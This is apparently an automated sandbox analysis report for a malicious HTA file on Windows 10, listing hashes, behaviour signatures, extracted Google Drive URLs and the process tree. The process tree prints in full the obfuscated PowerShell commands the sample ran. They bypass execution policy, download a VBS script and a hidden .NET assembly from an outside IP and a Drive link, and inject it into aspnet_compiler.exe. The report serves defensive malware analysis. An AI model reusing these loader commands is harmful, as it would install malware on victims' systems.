Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
06-11-2024 07:17
General
-
Target
createdbestthingswithentirelifewithgoodfeaturesareonhere.hta
-
Size
206KB
-
MD5
40eb4da176e3f591e3fc3e0bca69344d
-
SHA1
616daeccc5d5728d358761c07002ba57f6095d77
-
SHA256
8e6892c56c8c98976d8f803126afeca1363b6bce6c461512c0258d361982d3e5
-
SHA512
bc2121a275d81ff4a4e4238192c65746067906ed56092dbeabdc26cf6cb878143229e5fad0770884d55978b46672c0fc11f02e01f6534125657cde75a6f300bc
-
SSDEEP
96:43F97AKid6lxkzJd6JxkzZtThPFINQy1ynyFd6Dd6kxkzbd6yQ:43F1AKefLhZtTPy1ynyPGgJhQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 34 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Evasion via Device Credential Deployment 2 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
-
Suspicious behavior: MapViewOfSection 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 32 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\createdbestthingswithentirelifewithgoodfeaturesareonhere.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WinDOwsPOWeRSHEll\V1.0\PoWErSHEll.EXe"C:\Windows\sySTEm32\WinDOwsPOWeRSHEll\V1.0\PoWErSHEll.EXe" "pOWERSHeLl.exE -Ex ByPasS -noP -W 1 -c DEvICeCreDENtIalDePLoyMENt.EXE ; iex($(IeX('[sySTem.tEXT.enCODING]'+[ChaR]58+[ChaR]0X3A+'utf8.GEtSTrIng([SYsTeM.CONveRt]'+[Char]0X3a+[char]58+'FrOMbaSE64sTrING('+[CHaR]0x22+'JFlzRURKSE91ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUmRFZkluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5BbnNpKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS1ZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5vS2phdURuVEQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhmaFVXbUR6WlIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVIVyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIll2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcFlOUHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFlzRURKSE91OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My40LjIzLzY2L3NlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aC52YnMiLDAsMCk7U3RBcnQtU2xlZVAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aC52YnMi'+[cHAR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -noP -W 1 -c DEvICeCreDENtIalDePLoyMENt.EXE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qogo0w23\qogo0w23.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2815.tmp" "c:\Users\Admin\AppData\Local\Temp\qogo0w23\CSC467DD9FF8EEF497CBE238EC79AE74177.TMP"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithmegreatwithentirelifewithgoodth.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd4WDZpbWEnKydnZVVybCA9IEYzVGh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9lJysneHBvcnQ9JysnZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwJysnIEYzVDt4WDZ3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZW50O3hYNmltJysnYWdlQnl0ZScrJ3MgPSB4WDZ3ZWJDbGllbnQuRG93bmxvYWREYXRhKCcrJ3hYNmltYWdlVXJsJysnKTt4WDZpbWFnZVRleHQgPSBbU3lzdCcrJ2VtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh4WDZpbWFnZScrJ0J5dGVzKTt4JysnWDZzdGFydEZsYWcgPSBGM1Q8PEJBU0U2NF9TVEFSVD4+RjNUO3hYNmVuZEZsYWcgPSBGM1Q8PEJBU0U2NF9FTkQ+PkYzVDt4WDZzdGFydEluZGV4ID0geFg2aW1hZ2VUZXgnKyd0LkluZGV4T2YoeFg2c3RhcnRGbGFnKTt4WDZlbmRJbmRleCA9IHhYNmltYWdlVGV4dC5JbmRleE9mKHhYNmVuZEZsYWcpO3hYNnN0YXJ0SW5kZXggLWdlIDAgLWFuZCB4WDZlbmRJbmRleCAtZ3QgeFg2cycrJ3RhcnRJbmRleDt4JysnWDZzdGFydEluZGV4ICs9IHhYNnN0YScrJ3J0RmxhZy5MZW5ndGg7eFg2YicrJ2FzZTY0TGVuZ3RoID0geFg2ZW5kSW5kZXggLSB4WDZzdGFydEluZGV4O3hYNmJhc2U2NENvbW0nKydhbmQgPSB4WDZpbWFnZVQnKydleHQuU3Vic3RyaW5nKHhYNnN0YXJ0SW5kZXgnKycsICcrJ3hYNmJhc2U2NExlbmd0aCk7eFg2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoeFg2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFluViBGb3JFYWNoLU9iamVjdCB7IHhYNl8nKycgfScrJylbLTEuLi0oeFg2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTt4WDZjbycrJ21tYScrJ25kQnl0ZXMgPSBbU3lzJysndGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHhYNmJhc2U2NFJldmVyc2VkKTt4WDZsJysnb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWJseV06OkxvYWQoeFg2Y29tbWFuZEJ5dGVzKTt4JysnWDZ2YWlNZScrJ3Rob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKEYnKyczVFZBSUYzVCk7eFg2dmFpTWV0aG9kLkludm9rZSh4WDZudWxsLCBAKEYzVHR4dC5MRVNTQUMvJysnNjYvMzIuNC4zNzEuNzAxLy86cHR0aEYzVCwgRjNUZGVzYXRpJysndmFkb0YzVCwgRjNUZGVzYXRpdmFkb0YzVCwgRjNUZGVzYXRpdmFkb0YzVCwgRjNUYXNwbmV0X2NvbXBpbGVyRjNULCBGM1RkZXNhdGl2YWRvRjNULCBGM1RkZXNhdGl2YWRvJysnRjNULEYzVGRlc2F0aXZhZG9GM1QsRjNUZGVzYScrJ3RpdmFkb0YzVCxGM1RkZXNhdGl2YWRvRjNULEYzVCcrJ2Rlc2F0aXZhZG9GM1QsRjNUZGVzYXRpdmFkb0YzVCxGM1QxRjNULEYzVGRlc2F0aXZhZG9GM1QpKTsnKS5yRXBMQWNlKChbQ2hBUl0xMjArW0NoQVJdODgrW0NoQVJdNTQpLFtTVHJpTmddW0NoQVJdMzYpLnJFcExBY2UoJ1luVicsW1NUcmlOZ11bQ2hBUl0xMjQpLnJFcExBY2UoJ0YzVCcsW1NUcmlOZ11bQ2hBUl0zOSkgfCYgKCAkU2hFTExJZFsxXSskc2hlbGxpRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('xX6ima'+'geUrl = F3Thttps://drive.google.com/uc?e'+'xport='+'download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0'+' F3T;xX6webClient = New-Object System.Net.'+'WebClient;xX6im'+'ageByte'+'s = xX6webClient.DownloadData('+'xX6imageUrl'+');xX6imageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(xX6image'+'Bytes);x'+'X6startFlag = F3T<<BASE64_START>>F3T;xX6endFlag = F3T<<BASE64_END>>F3T;xX6startIndex = xX6imageTex'+'t.IndexOf(xX6startFlag);xX6endIndex = xX6imageText.IndexOf(xX6endFlag);xX6startIndex -ge 0 -and xX6endIndex -gt xX6s'+'tartIndex;x'+'X6startIndex += xX6sta'+'rtFlag.Length;xX6b'+'ase64Length = xX6endIndex - xX6startIndex;xX6base64Comm'+'and = xX6imageT'+'ext.Substring(xX6startIndex'+', '+'xX6base64Length);xX6base64Reversed = -join (xX6base64Command.ToCharArray() YnV ForEach-Object { xX6_'+' }'+')[-1..-(xX6base64Command.Length)];xX6co'+'mma'+'ndBytes = [Sys'+'tem.Convert]::FromBase64String(xX6base64Reversed);xX6l'+'oadedAssembly = [System.Refl'+'ection.Assembly]::Load(xX6commandBytes);x'+'X6vaiMe'+'thod = [dnlib.IO.Home].GetM'+'ethod(F'+'3TVAIF3T);xX6vaiMethod.Invoke(xX6null, @(F3Ttxt.LESSAC/'+'66/32.4.371.701//:ptthF3T, F3Tdesati'+'vadoF3T, F3TdesativadoF3T, F3TdesativadoF3T, F3Taspnet_compilerF3T, F3TdesativadoF3T, F3Tdesativado'+'F3T,F3TdesativadoF3T,F3Tdesa'+'tivadoF3T,F3TdesativadoF3T,F3T'+'desativadoF3T,F3TdesativadoF3T,F3T1F3T,F3TdesativadoF3T));').rEpLAce(([ChAR]120+[ChAR]88+[ChAR]54),[STriNg][ChAR]36).rEpLAce('YnV',[STriNg][ChAR]124).rEpLAce('F3T',[STriNg][ChAR]39) |& ( $ShELLId[1]+$shelliD[13]+'x')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
-
-
-
C:\Windows\SysWOW64\ieUnatt.exe"C:\Windows\SysWOW64\ieUnatt.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD55f5b6eda0d051e24fb7f94106ae78aad
SHA18dcdfa314a98e62c33610aff54bbbd25ce02ef76
SHA2563584130902a208251c115536d6c330731ecf5ec9ebb5b8a16ced013ab2f2441c
SHA512a0fcfaa6f788f601db8be17f3a824dd10ee291a4cb0b2903f8378909f5f73ee0760c430718da48d0d6e8f6dcb775d752232f6ab99a0db91da79bf623e09e927b
-
Filesize
18KB
MD52ae3e9b8e1568b79cf9be0b8babcd8b4
SHA14096b8a62bffc6126ec8dd5f25019afba61d4392
SHA256eb8dfe82a6cbf226bd4530656bdda8436ace185249da8072bc2cf30db52b8d54
SHA51292bb38de6a6b9ea9a143880c2480f75d556370c8e6447fcc70f46e91d49f7a5291da41325997d2976cd6bd8a58116f19ec78993f52d0a73e7873bb1b9fa383e9
-
Filesize
1KB
MD533ec4ea3a43a3fa79e7a12967fc177d1
SHA194aead150ecd0b83770a326990605f47b59bcb62
SHA256a5a20d06af27e82c3fe0b90ace2e883b63d3d208b3faebe7ae68bf6fa2e7cb7c
SHA5128d5c9af83d8ac9301dfd437e588752a507493684a718808652a596b682baaf46e750e43104f3eb267dfcb4c948969f8e4abfa3bfdb4f0876db320630ed5fe839
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD59b6d6d7c69ded79d12553c04fac121b9
SHA117549ccd7a4797cbedf11369e827e2aa33de781b
SHA2568e80d9b85e9471e4bc17a2658c3065c97788eaa4e999fa1b1082c40bb3162d98
SHA512905b190e58cd34898ea4096f6fcd3112b421dcc647af742348a0a2a6cc6a7eeca652a9c75a569e7633a635ba3dc548d2bd7b68be1ffc09ca07f7d5dff4448185
-
Filesize
138KB
MD54bbb30fded9fd12bffb37261d39e8139
SHA131b47da89bcba90315661300076b567f6682f33b
SHA2562ba56dfa938b61c01b9c3db3ff37f975af3cd3a883aae027feb6d59537d0f72e
SHA512e8a5e561bbd94b9439d11b7d2e161c036610754fbca5dafbbee830ae8703714d1e7b86da1e257e485cdf942651991452516561e9ed242f61b93729e623cb7b92
-
Filesize
652B
MD517c7243743d6d535ccd0d9afd6d4aa06
SHA1aadcac0690cc946c8ea47e7878122f5ced5f70ce
SHA256f69bd6f805e9a3a2f8d88e58f4afc080fa0aba1aedfa747f311e244703f0c68a
SHA512a1f16692bce70f45aec1266aae9ea4ad59cd1d7a1eff4ddd7ff2b0f4cfb895a6cc7392efe2683ae38f96742e087b09b38620d576967f7aa7c8686dc85a6e7b07
-
Filesize
467B
MD520f1899a90d8d923e72108e6375f7f61
SHA1a4208600d31f73bbd9698c7c8136415a1462f2f5
SHA2568a577d1ab0482d3828f19fceffb2f1bab9b17aa96f8673e6ba0892eb36330ed4
SHA5127c70f145982ba48be956c1aa11b0a638bd8a8f0cf1e5d41f117943efcff94281f00519f0dff67d8e30857765ef1404160b0cc9105bd7f76c6ce81722e507ebc1
-
Filesize
369B
MD5cbeaa1eda460fec457fe0adcbc2c6016
SHA1e079fb53e8fcbcbb58d3042ac9eb2ac2a975e2cc
SHA25673a1267145b00885b1573cb6c02653ffed0375ee1ef2e2859a496c5e775b89d3
SHA512bfaebdf24f1d9b1b9e77946ef6d7090f3bc6140001603d8e4036a82b8accf8700caad4e7c200e256283494894fb1593dbe88d5caad7e5f7629ef1a93fe0a6847
-
Filesize
3.3MB
-
Filesize
268KB
-
Filesize
268KB
-
Filesize
852KB
-
Filesize
304KB
-
Filesize
56KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
652KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
120KB
-
Filesize
200KB
-
Filesize
624KB
-
Filesize
1.3MB
-
Filesize
280KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
32KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
1004KB